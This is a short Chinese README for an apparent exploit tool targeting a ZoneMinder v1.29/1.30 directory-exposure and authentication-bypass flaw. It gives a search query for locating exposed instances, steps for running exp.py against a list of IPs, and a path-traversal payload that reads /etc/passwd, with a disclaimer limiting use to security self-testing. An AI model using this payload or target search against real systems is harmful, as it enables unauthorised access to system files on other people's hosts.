ZoneMinder是一款开源视频监控系统.当异常事件发生时,你就可以收到e-mail或简讯通知。ZoneMinder v1.30和v1.29捆绑的Apache HTTP Server配置中存在信息泄露和认证绕过漏洞,允许远程未认证攻击者浏览web根目录下的所有目录。
app="ZoneMinder"
1.将准备检测的IP地址放入ip.txt文件中
2.运行python3 exp.py
/?view=file&path=/../../../../../etc/passwd
本工具仅提供给安全测试人员进行安全自查使用 用户滥用造成的一切后果与作者无关 使用者请务必遵守当地法律 本程序不得用于商业用途,仅限学习交流
